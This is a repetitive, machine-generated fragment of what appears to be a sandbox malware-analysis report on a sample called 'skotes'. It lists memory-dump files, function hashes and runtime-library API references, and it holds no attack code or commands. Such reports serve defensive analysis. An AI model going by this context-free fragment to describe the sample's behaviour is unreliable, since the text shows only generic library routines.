                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2508902052-0
                                                                                                                                                                                            • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                            • Instruction ID: caf3480cb9c0a5eb07271efb9b7d9152a8a58d8fe42a3c9826b87b7ca87063df
                                                                                                                                                                                            • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                            • Instruction Fuzzy Hash: DC817D71E04A25AFCB18CFA8D5849ADB7F2FF99304B1546ADD445AB701C730AD42CF84
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0062EC81
                                                                                                                                                                                              • Part of subcall function 00628F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00628F50
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0062ECE7
                                                                                                                                                                                            • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0062ECFF
                                                                                                                                                                                            • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0062ED0C
                                                                                                                                                                                              • Part of subcall function 0062E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0062E7D7
                                                                                                                                                                                              • Part of subcall function 0062E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0062E86F
                                                                                                                                                                                              • Part of subcall function 0062E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0062E879
                                                                                                                                                                                              • Part of subcall function 0062E7AF: Concurrency::location::_Assign.LIBCMT ref: 0062E8AD
                                                                                                                                                                                              • Part of subcall function 0062E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0062E8B5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2363638799-0
                                                                                                                                                                                            • Opcode ID: a20a082af52fc53646d19dd7a7a55f9e88c74045ea931039f5363cddff1903cf
                                                                                                                                                                                            • Instruction ID: 7c7d7beb07c282789f4d3135abd9290b9514ea0b4cac98bdf8c82911b8533fbe
                                                                                                                                                                                            • Opcode Fuzzy Hash: a20a082af52fc53646d19dd7a7a55f9e88c74045ea931039f5363cddff1903cf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9251B031A00625EBDF24DF50D895BADB777AF44310F1444A8E9027B392CB72AE06CFA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • NtFlushProcessWriteBuffers.NTDLL ref: 0061CBAA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2982998374-0
                                                                                                                                                                                            • Opcode ID: 41ca565a1a5eef6b38a79149da62223fdf875f3c4c77146e98c96c540d63119a
                                                                                                                                                                                            • Instruction ID: b6e2e481adecfbf0e8d7e07fbc42b5db397ddfcfa251dc4b8885fd0919ff471d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 41ca565a1a5eef6b38a79149da62223fdf875f3c4c77146e98c96c540d63119a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43B09232A1B93047CB516B14BC095DD7716AB80B22B0A2156D802E7234CA509E828BD4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
